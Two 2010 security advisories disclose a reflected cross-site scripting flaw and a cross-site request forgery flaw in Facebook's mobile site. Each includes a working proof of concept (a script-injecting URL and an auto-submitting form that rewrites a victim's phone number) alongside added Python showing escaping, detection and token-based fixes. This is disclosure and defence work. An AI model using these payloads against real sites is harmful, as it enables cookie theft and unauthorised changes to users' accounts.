
2010-001: Facebook HTML and Script code injection vulnerability
2010-002: Facebook Cross-Site Request Forgery vulnerability

2010-001: Facebook HTML and Script code injection vulnerability

Original release date: January 8th, 2010
Last revised: February 3rd, 2010
Discovered by: Juan Galiana Lara
Severity: 6.3/10 (CVSS base score)

BACKGROUND

Facebook is a social networking website that is operated and privately owned by Facebook, Inc. Users can add friends and send them messages, and update their personal profiles to notify friends about themselves. Additionally, users can join networks organized by city, workplace, school, and region. The website's name stems from the colloquial name of books given at the start of the academic year by university administrations with the intention of helping students to get to know each other better.

DESCRIPTION

The mobile interface of the Facebook social network is affected by a Cross-Site Scripting (XSS) vulnerability because the variable "q" is not properly sanitized in http://m.facebook.com/friends.php.

An attacker can inject HTML or script code that runs in the context of the victim's browser, and so can perform XSS attacks and steal the cookies of a targeted user.

PROOF OF CONCEPT

http://m.facebook.com/friends.php?q=%3Cscript%3Ealert(%22XSS%22)%3B%3C%2Fscript%3E
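An added illustration (not Facebook's code) of the defect class described above, modelled in Python: the unsafe handler reflects "q" verbatim, the hardened one entity-encodes it, and a small log check flags request lines whose "q" decodes to a script tag. The request lines and function names are constructed for this example.

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample request lines: the advisory's PoC URL, a benign search,
# and a double-encoded variant of the same payload.
SAMPLE_REQUESTS = [
    "GET /friends.php?q=%3Cscript%3Ealert(%22XSS%22)%3B%3C%2Fscript%3E HTTP/1.1",
    "GET /friends.php?q=john HTTP/1.1",
    "GET /friends.php?q=%253Cscript%253Ealert(1)%253C%252Fscript%253E HTTP/1.1",
]


def q_param(path: str) -> str:
    """Decoded value of the q query parameter, '' if absent."""
    return parse_qs(urlsplit(path).query).get("q", [""])[0]


def render_unsafe(q: str) -> str:
    """Reflects q verbatim into the page: the pattern the advisory describes."""
    return f"<p>Results for: {q}</p>"


def render_safe(q: str) -> str:
    """Entity-encodes q so any markup in it is displayed as text, not parsed."""
    return f"<p>Results for: {html.escape(q, quote=True)}</p>"


SCRIPT_TAG = re.compile(r"<\s*/?\s*script\b", re.IGNORECASE)


def flag_script_in_q(request_line: str) -> bool:
    """True if the request's q parameter decodes (once or twice) to a <script> tag."""
    path = request_line.split(" ")[1]
    value = q_param(path)          # parse_qs already removed one layer of encoding
    for _ in range(2):             # second pass catches double-encoded values
        if SCRIPT_TAG.search(value):
            return True
        value = unquote(value)
    return False


def flagged_requests(lines):
    """Subset of request lines whose q parameter carries a script tag."""
    return [line for line in lines if flag_script_in_q(line)]


if __name__ == "__main__":
    poc_q = q_param(SAMPLE_REQUESTS[0].split(" ")[1])
    print(render_unsafe(poc_q))
    print(render_safe(poc_q))
    print(flagged_requests(SAMPLE_REQUESTS))
```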

BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser; this can be leveraged to steal the targeted user's cookies.

SYSTEMS AFFECTED

Facebook

SOLUTION

Corrected

REFERENCES

http://www.facebook.com
http://www.isecauditors.com
http://juangaliana.blogspot.com

CREDITS

This vulnerability has been discovered by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).

REVISION HISTORY

January 8, 2010: Initial release.
February 3, 2010: Last revision.

DISCLOSURE TIMELINE

January 2, 2010: Discovered by Internet Security Auditors.
January 9, 2010: Vendor contacted including PoC. No response.
January 11, 2010: Second contact. No response.
January 19, 2010: Third contact. No response.
January 20, 2010: Vulnerability corrected without any kind of contact.
January 31, 2010: Response from a Facebook Security member requesting information.
February 3, 2010: Sent to lists for public interest.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.


2010-002: Facebook Cross-Site Request Forgery vulnerability

Original release date: February 2nd, 2010
Last revised: February 12th, 2010
Discovered by: Juan Galiana Lara
Severity: 6.3/10 (CVSS score)

BACKGROUND

Facebook is a social networking website that is operated and privately owned by Facebook, Inc. Users can add friends and send them messages, and update their personal profiles to notify friends about themselves. Additionally, users can join networks organized by city, workplace, school, and region. The website's name stems from the colloquial name of books given at the start of the academic year by university administrations with the intention of helping students to get to know each other better.

DESCRIPTION

The mobile interface of the Facebook social network is affected by a Cross-Site Request Forgery (CSRF) vulnerability. The CSRF is possible because the resource http://m.facebook.com/a/editprofile.php is not protected with an anti-CSRF token when updating some variables such as phone_cell or phone_other. An attacker can force a user to perform actions on Facebook, changing the user's profile in an unauthorized manner.

PROOF OF CONCEPT

CSRF POC:

<html>
<head>
<script>
// Submits the first form on the page.
function send() {
    document.forms[0].submit();
}
</script>
</head>

<!-- The form is submitted automatically as soon as the page loads. -->
<body onload="send();">
<form action="http://m.facebook.com/a/editprofile.php?edit=phone_cell&type=contact" method="post">
    <input type="hidden" name="phone_num" value="600000000">
    <input type="hidden" name="save" value="">
</form>
</body>
</html>

Other variables are affected, such as phone_num and phone_ext when the edit parameter has the value phone_other.
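An added model (not Facebook's code) of the editprofile.php handler in Python, contrasting the unprotected behaviour the advisory describes with a version that requires a per-session synchronizer token and, as defence in depth, a same-origin Origin header. The session ids, the server secret, the csrf_token field name and the profile store are constructed for this example.

```python
import hashlib
import hmac
import secrets

# Constructed: a server-side secret, two logged-in sessions, and the edit values
# named in the advisory.
SERVER_SECRET = secrets.token_bytes(32)
PROFILES = {
    "victim-session": {"phone_cell": "", "phone_other": ""},
    "attacker-session": {"phone_cell": "", "phone_other": ""},
}
ALLOWED_EDITS = {"phone_cell", "phone_other"}
SITE_ORIGIN = "http://m.facebook.com"


def csrf_token(session_id: str) -> str:
    """Token bound to one session; the genuine edit form embeds it as a hidden field."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def edit_profile_unprotected(session_id: str, edit: str, form: dict) -> int:
    """The pattern the advisory describes: any POST from a logged-in browser is honoured,
    so a form auto-submitted from another site (like the PoC) succeeds."""
    if edit not in ALLOWED_EDITS or "save" not in form:
        return 400
    PROFILES[session_id][edit] = form.get("phone_num", "")
    return 200


def edit_profile_protected(session_id: str, edit: str, form: dict, origin=None) -> int:
    """Same action, but the POST must carry this session's token, compared in
    constant time; an Origin header, when present, must match the site."""
    if edit not in ALLOWED_EDITS or "save" not in form:
        return 400
    if not hmac.compare_digest(form.get("csrf_token", ""), csrf_token(session_id)):
        return 403
    if origin is not None and origin != SITE_ORIGIN:
        return 403
    PROFILES[session_id][edit] = form.get("phone_num", "")
    return 200


if __name__ == "__main__":
    # Replay the PoC form body against both handlers.
    poc_form = {"phone_num": "600000000", "save": ""}
    print(edit_profile_unprotected("victim-session", "phone_cell", poc_form))  # 200
    print(edit_profile_protected("victim-session", "phone_other", poc_form))   # 403
```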

BUSINESS IMPACT

An attacker can force an end user to execute unwanted actions on Facebook. Successful exploitation of the proof of concept allows the attacker to update data in the victim's profile.

SYSTEMS AFFECTED

Facebook

SOLUTION

Corrected.

REFERENCES

http://www.facebook.com
http://www.isecauditors.com
http://juangaliana.blogspot.com

CREDITS

This vulnerability has been discovered and reported by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).

REVISION HISTORY

February 2, 2010: Initial release.
February 10, 2010: Last revision.

DISCLOSURE TIMELINE

February 2, 2010: Discovered by Internet Security Auditors.
February 3, 2010: Vendor contacted.
February 4, 2010: Response: under review.
February 9, 2010: Corrected.
February 10, 2010: Status requested. Response: correction in progress.
February 12, 2010: Sent to lists.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.
